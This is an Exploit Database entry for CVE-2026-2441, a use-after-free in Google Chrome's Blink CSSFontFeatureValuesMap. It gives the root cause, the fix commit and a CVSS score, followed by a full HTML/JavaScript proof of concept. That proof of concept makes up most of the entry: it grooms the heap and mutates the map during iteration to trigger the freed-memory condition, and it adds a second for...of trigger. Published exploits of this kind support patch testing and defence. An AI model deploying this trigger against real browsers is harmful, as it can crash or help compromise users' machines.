This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap EDB-ID: 52542 CVE: 2026-2441 EDB Verified: Author: NU11SECUR1TY Type: LOCAL Exploit: / Platform: MULTIPLE Date: 2026-04-30 Vulnerable App: # Exploit Title: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap # Date: 2026-02-23 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://www.google.com/chrome/ # Version: Chrome <= 144.x | Chrome < 145.0.7632.75 # Tested on: Windows 11 / Linux / macOS # CVE: CVE-2026-2441 # Exploit Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441 ## Description A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink) within the CSSFontFeatureValuesMap implementation. When an iterator is created over a CSSFontFeatureValuesMap object and the underlying HashMap is mutated during iteration, a rehash operation occurs, freeing the original memory while the iterator still holds a raw pointer to it. This leads to a use-after-free condition that can be exploited to execute arbitrary code inside the Chrome sandbox. The vulnerability was actively exploited in the wild as a zero-day before the patch was released. ## Vulnerable Versions - Google Chrome <= 144.x - Google Chrome < 145.0.7632.75 - Microsoft Edge (prior to Chromium 145 update) - Opera (prior to 127.0.5778.64) - Any Chromium-based browser using affected Blink versions ## Technical Details **Root Cause:** In `third_party/blink/renderer/core/css/css_font_feature_values_map.cc`, the `FontFeatureValuesMapIterationSource` holds a raw pointer (`const FontFeatureAliases* aliases_`) to the internal HashMap. When the map is mutated via `set()` or `delete()` during iteration, the HashMap rehashes, the old storage is freed, and the pointer becomes dangling. **Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw pointer with a deep copy (`const FontFeatureAliases aliases_`). ## CVSS Score **8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ## Proof of Concept ```html <!DOCTYPE html> <!-- CVE-2026-2441 - CSSFontFeatureValuesMap UAF Author: nu11secur1ty Date: 2026-02-23 Repository: --> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="author" content="nu11secur1ty"> <title>CVE-2026-2441 PoC - nu11secur1ty</title> <style id="target-style"> @font-feature-values Target { @styleset { a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8; i:9; j:10; k:11; l:12; m:13; n:14; o:15; } } </style> <style id="groom-style"></style> </head> <body> <h2>CVE-2026-2441 Proof of Concept</h2> <p>Author: nu11secur1ty</p> <p>Check browser console for output. If browser crashes -> VULNERABLE</p> <script> // ================================================================= // CVE-2026-2441 Use-After-Free Exploit // Author: nu11secur1ty // ================================================================= console.log("=========================================="); console.log("CVE-2026-2441 PoC - nu11secur1ty"); console.log("=========================================="); // Heap grooming - create stable heap state function groomHeap(count) { let style = document.getElementById('groom-style'); if (!style || !style.sheet) return []; // Clear existing while (style.sheet.cssRules.length) { try { style.sheet.deleteRule(0); } catch(e) {} } // Create groom objects for (let i = 0; i < count; i++) { try { style.sheet.insertRule( `@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`, style.sheet.cssRules.length ); } catch(e) {} } console.log("[+] Heap groomed with " + count + " objects"); return Array(count); } // Main exploit logic try { // Phase 1: Prepare heap groomHeap(64); // Phase 2: Get target map let sheet = document.getElementById('target-style').sheet; if (!sheet || !sheet.cssRules.length) { throw new Error("Target CSS rule not found"); } let rule = sheet.cssRules[0]; let map = rule.styleset; console.log("[+] CSSFontFeatureValuesMap size: " + map.size); // Phase 3: Create iterator - RAW POINTER CAPTURED HERE console.log("[*] Creating iterator (raw pointer captured)"); let iterator = map.entries(); let step = 0; let iterations = 0; // Phase 4: Trigger UAF through mutation + rehash console.log("[*] Triggering rehash + UAF..."); while (step < 10) { let result = iterator.next(); if (result.done) break; let [key, value] = result.value; iterations++; console.log(" [step " + step + "] Read: " + key + " = " + value); // MUTATION: delete current key map.delete(key); // MUTATION: massive insert to force rehash for (let i = 0; i < 512; i++) { map.set("spray_" + step + "_" + i, [i, i+1, i+2]); } step++; } console.log("[*] Completed " + iterations + " iterations"); // Phase 5: Final check console.log("[*] Exploit execution complete"); console.log("[*] If browser crashed: VULNERABLE"); console.log("[*] If page survived: PATCHED"); console.log("=========================================="); console.log("CVE-2026-2441 - nu11secur1ty"); console.log("Repository: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441"); console.log("=========================================="); } catch (e) { console.log("[!] EXCEPTION: " + e.message); console.log("[!] This indicates UAF was triggered"); console.log("[!] CVE-2026-2441 - nu11secur1ty"); } // Force layout recalc as additional trigger void document.body.offsetWidth; </script> <!-- Alternative for...of trigger --> <script> try { let altStyle = document.createElement('style'); document.head.appendChild(altStyle); altStyle.sheet.insertRule( '@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0 ); let altMap = altStyle.sheet.cssRules[0].styleset; for (let [k, v] of altMap) { altMap.delete(k); for (let i = 0; i < 256; i++) { altMap.set("alt_" + i, [i]); } break; } } catch(e) { console.log("[!] Alternative trigger exception: " + e.message); } </script> </body> </html> # Demo: [href](https://www.patreon.com/posts/cve-2026-2441-151454779) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.